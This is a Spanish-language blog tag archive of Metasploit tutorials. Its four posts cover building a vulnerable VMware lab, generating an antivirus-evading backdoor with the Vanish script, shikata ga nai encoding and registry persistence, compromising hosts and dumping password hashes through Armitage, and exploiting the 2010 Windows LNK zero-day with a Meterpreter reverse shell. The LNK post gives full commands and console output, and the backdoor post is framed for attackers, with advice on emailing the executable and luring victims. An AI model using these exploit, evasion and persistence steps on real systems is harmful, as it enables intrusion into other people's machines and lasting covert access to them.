Tag Archive | metasploit
2011/12/29  

Preparando entorno vulnerable para pruebas de pentesting

Hola!

Muy  buenas a todos/as!

El otro día con la guía de Offensive Security configurábamos un Windows XP Service Pack 2 para hacer pruebas de pentesting.

Hoy lo que haremos será preparar un entorno completo vulnerable para hacer pruebas, por ejemplo con Metasploit.

El gráfico de red sería el siguiente:

Ya tenemos el gráfico del entorno que configuararemos.

Para trabajar con este entorno lo haremos con una nueva red que añadiremos en VMware

Este el menú principal de VMware Workstation 8, nos dirijimos a Virtual Network Editor

Como no quiero fastidiar ningún entorno que tengo ahora añadiremos una interfaz mas, con otro rango de direcciones IP

Añadimos la interfaz que deseemos

He cambiado el rango del DHCP, ahora todas las máquinas del entorno vulnerable serán asignadas a VMnet2

Para el entorno usaremos Metasploitable, pero el que tienen creado en la web de Metasploit, se puede descargar aquí

Para Windows Server 2003, Windows Server 2000, Windows XP SP2 Y SP3, neesitaremos una licencia válida.

Además de descargar Metasploitable de los chicos de Metasploit, también descargad UltimateLAMP, lo usaremos en el entorno mas tarde, se puede obtener de aquí

En el siguiente apartado, empezaremos a hacer prácticas con el entorno

 

Saludos cordiales

2011/12/28  

Backdoor indetectable generado con Metasploit

Hola!

Muy buenas a todos/as!

Muchas de las veces en las que se consigue acceso remoto a otro host mediante una vulnerabilidad explotada con Metasploit (por ejemplo) en la que conseguimos una shell con Meterpreter. Es bueno intentar dejar un backdoor por si queremos volver a acceder en un futuro.

La problemática de un backdoor instalado en la parte de la víctima es la detección del antivirus, que aunque no sea la panacea de la seguridad, cumple parte de su función.

Para que el ejecutable que dejaremos no sea detectado por el antivirus codificaremos el ejecutable con shitaka ga nai de Metasploit, tras conseguir acceso remoto en el equipo lo dejaremos en el equipo víctima, además pondremos una clave en el registro para que se inicie en cada inicio del sistema operativo.

Para hacer esta tarea, usaremos un script de SecurityLabs y The Hackers News que se llama Vanish, lo podemos descargar de aquí

Como dependencias para usar el script hemos de instalar las siguientes dependencias

root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Nos bajamos el script

root@bt:~# wget http://localhostr.com/file/p4SrRVe/vanish.sh

Si queremos consultar el código fuente del script podemos también verlo en Pastebin

Una vez hemos descargado el script, si lo usamos en backtrack como es mi caso, lo hemos de copiar a la carpeta donde se encuentre Metasploit, es decir, /pentest/exploit/framework

Una vez lo hayamos copiado, lo ejecutamos, nos irá haciendo preguntas sobre la targeta de red, un número seed aleatorio y las veces que será encodeado con shitaka ga nai

El ejecutable se creará, nos hará una firma de hash del ejecutable, además de meterlo en una carpeta que se llama seclab

Para comprobar la fiabilidad de nuestro ejecutable lo subiremos a Virus Total, del que obtendremos una buena noticia dado el bajo ratio de detección:

El ratio de detección es muy bajo y eso nos permitirá el poder evadir la mayoría de antivirus

Como ya tenemos sesión con Meterpreter es sencillo el poder subir un archivo al host víctima

Le cambiado el nombre para que el archivo no se llame backdoor.exe :P

Ahora depende del atacante si quiere dejarlo así y enviar este ejecutable por email o ejecutarlo cada vez que vulnera la máquina o bien, puede añadir una entrada al registro para que se inicie en cada inicio de sistema operativo.

Luego desde la máquina atacante podemos hacer una conexión al host víctima

Podremos tener accesos remotos al equipo víctima tantas veces como deseemos con el backdoor generado.

Saludos cordiales

2011/06/24  

Armitage GUI front-end de Metasploit

Hola!

Muy buenas a todos/as!

Quien se dedica a la seguridad conoce sin duda metasploit. Metasploit puede ser complicado de usar si no conocemos bien como funciona. Existen GUI gráficas como Armitage.

Armitage trabaja como front-end de Metasploit.

En Backtrack está en los repositorios así que lo instalamos con:

root@bt: apt-get install armitage

Con esto tendremos Armitage instalado en nuestro sistema.

Igual que hacíamos con autopown usando Fasttrack necesitamos usar MYSQL, así que iniciamos MYSQL:

root@bt: /etc/init.d/mysql start

Ahora nos conectaremos a la base de datos para poder usar Armitage, como lo haremos por defecto lo haremos así:

root@bt:~# msfrpcd -f -U msf -P test -t Basic
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic…
[*] XMLRPC ready at Thu Jun 23 20:28:49 +0200 2011.

Ahora arrancaremos Armitage:

root@bt:/pentest/exploits/armitage# ./armitage.sh

Si no hemos cambiado anda de la instalación de Backtrack por defecto, esto lo dejamos de esta manera.

Armitage nos avisa que usará el driver mysql.

Esta es la pantalla principal de Armitage, a la izquierda tenemos una lista de exploits de Metasploit, abajo tenemosla consola de Metasploit.

Ahora lo que haremos es encontrar los equipos para el lanzamiento de los exploits.

Con NAMP lo que haremos es lo que hacemos normalmente, que es buscar puertos abiertos, versión del sistema operativo etc..

Introducimos el rango de IP’s que queremos escanear o bien la dirección IP del host directamente si la conocemos.

Como ya tenemos el scan echo podemos encontrar ataques con las vulnerabilidades que encontremos.

Podemos ver que se ha indetificado como un equipo Windows XP

Si clicamos en encima del Host podemos ver Services y Host, si le damos a services podemos ver lo servicios que ha identificado

Ya tenemos los servicios

Ahora podemos buscar exploits de Metasploit basandose en los puertos y servicios que ha encontrado.

Ahora  ya ha encontrado los ataques que podemos hacerle.

Tenemos un menú para poder lanzar el ataque que queramos.

Podemos especificar opciones avanzadas en el ataque.

Cuando la máquina es comprometida sale así

Ya está el equipo comprometido.

En la consola de Metasploit podemos ver que ha conseguido una sesion de Meterpreter

De manera gráfica también tenemos las opciones disponibles con Meterpreter

Podemos navegar de manera perfecta por todo el sistema operativo

Y podemos sacar los Hashes de los usuarios

Y podemos obtener una consola CMD de Windows.

 

Y hasta aquí una sesión de Meterpreter.

 

2010/07/27  

Explotando vulnerabilidad “LNK” con Metasploit

Hola!

Muy buenas a todos/as!

Parece que la ley de Murphy impera en la informática y es que Microsoft decide acabar con el Soporte para Windows XP y 2000 y ¡pam! sacan un zero day.

Han tardado poco pero han sacado un POC para Metasploit

Tendremos que actualizar Metasploit y lo que haremos será:

|                    |      _) |
__ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
|   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ — –=[ 570 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9930 updated today (2010.07.26)

msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute

Especificamos el exploit

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.78.133
SRVHOST => 192.168.78.133

Ahora indicamos el Host

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVPORT 80
SRVPORT => 80

Indicamos el puerto al que se tendrá que conectar la víctima

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Elegimos el PAYLOAD

set LHOST 192.168.162.136

Elegimos el Host

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LPORT 443
LPORT => 443

Ahora escogemos el puerto desde metasploit nos dará la shell con meterpreter

Y ahora ejecutamos el  exploit

exploit

Nos ha de salir algo como esto:

msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.78.133:443
[*]
[*] Send vulnerable clients to \\192.168.78.133\HGkqi\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*]
[*] Using URL: http://192.168.78.133:80/
[*] Server started.

Ahora el cliente tendría navegar por una dirección “maligna”

El conseguir que pase por una dirección maliogna podemos engañale para que visite nuestra web con NOIP por ejemplo

Cuando el cliente se conecte a nuestro servidor vulenrable, veremos como el exploit funciona

msf exploit(ms10_xxx_windows_shell_lnk_execute) > [*] Sending UNC redirect to 192.168.78.139:49278 …
[*] Responding to WebDAV OPTIONS request from 192.168.78.139:49285
[*] Responding to WebDAV OPTIONS request from 192.168.78.139:49285
[*] Responding to WebDAV OPTIONS request from 192.168.78.139:49291
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/desktop.ini
[*] Sending 404 for /HGkqi/desktop.ini …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Sending LNK file to 192.168.78.139:49291 …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/VuztjejOY.dll.manifest
[*] Sending 404 for /HGkqi/VuztjejOY.dll.manifest …
[*] Sending DLL payload 192.168.78.139:49291 …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/VuztjejOY.dll.123.Manifest
[*] Sending 404 for /HGkqi/VuztjejOY.dll.123.Manifest …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/VuztjejOY.dll.124.Manifest
[*] Sending 404 for /HGkqi/VuztjejOY.dll.124.Manifest …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/VuztjejOY.dll.2.Manifest
[*] Sending 404 for /HGkqi/VuztjejOY.dll.2.Manifest …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Sending stage (748032 bytes) to 192.168.78.139
[*] Meterpreter session 1 opened (192.168.78.133:443 -> 192.168.78.139:49292) at 2010-07-27 07:04:27 +0200

Como podéis ver ya tendríamos una sesión abierta de Meterpreter

Abrimos la sesión:

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1

Y.. uala ya tenemos acceso al equipo:

meterpreter > getuid
Server username: W7\Seifreed

Y podemos ver los procesos:

meterpreter > ps

Process list
============

PID   Name                     Arch  Session  User         Path
—   —-                     —-  ——-  —-         —-
0     [System Process]
4     System
344   smss.exe
524   csrss.exe
576   wininit.exe
588   csrss.exe
640   winlogon.exe
664   services.exe
684   lsass.exe
692   lsm.exe
832   svchost.exe
920   svchost.exe
972   svchost.exe
1064  svchost.exe
1112  svchost.exe
1312  svchost.exe
1424  svchost.exe
1620  dwm.exe                  x86   1        W7\Seifreed  C:\Windows\system32\Dwm.exe
1628  spoolsv.exe
1648  explorer.exe             x86   1        W7\Seifreed  C:\Windows\Explorer.EXE
1716  taskhost.exe             x86   1        W7\Seifreed  C:\Windows\system32\taskhost.exe
1732  svchost.exe
1988  VMwareTray.exe           x86   1        W7\Seifreed  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1996  VMwareUser.exe           x86   1        W7\Seifreed  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
492   ProtectedObjectsSrv.exe
780   svchost.exe
1516  vmtoolsd.exe
1136  VMUpgradeHelper.exe
2436  TPAutoConnSvc.exe
2572  SearchIndexer.exe
2732  TPAutoConnect.exe        x86   1        W7\Seifreed  C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2840  svchost.exe
3264  conhost.exe              x86   1        W7\Seifreed  C:\Windows\system32\conhost.exe
3600  svchost.exe
1584  svchost.exe
3696  wmpnetwk.exe
1372  audiodg.exe              x86   0
452   iexplore.exe             x86   1        W7\Seifreed  C:\Program Files\Internet Explorer\iexplore.exe
3012  iexplore.exe             x86   1        W7\Seifreed  C:\Program Files\Internet Explorer\iexplore.exe
3088  klwtblfs.exe             x86   1        W7\Seifreed  C:\Program Files\Kaspersky Lab\Kaspersky PURE\klwtblfs.exe
3204  rundll32.exe             x86   1        W7\Seifreed  C:\Windows\system32\rundll32.exe

Aún no existe un parche oficial de Microsoft, para mitigar el problema podemos utilizar la mini guia de nuestros compañeros de Security By default

El advisory de Microsoft lo podemos ver aquí

Y hasta aquí hemos llegado Un saludo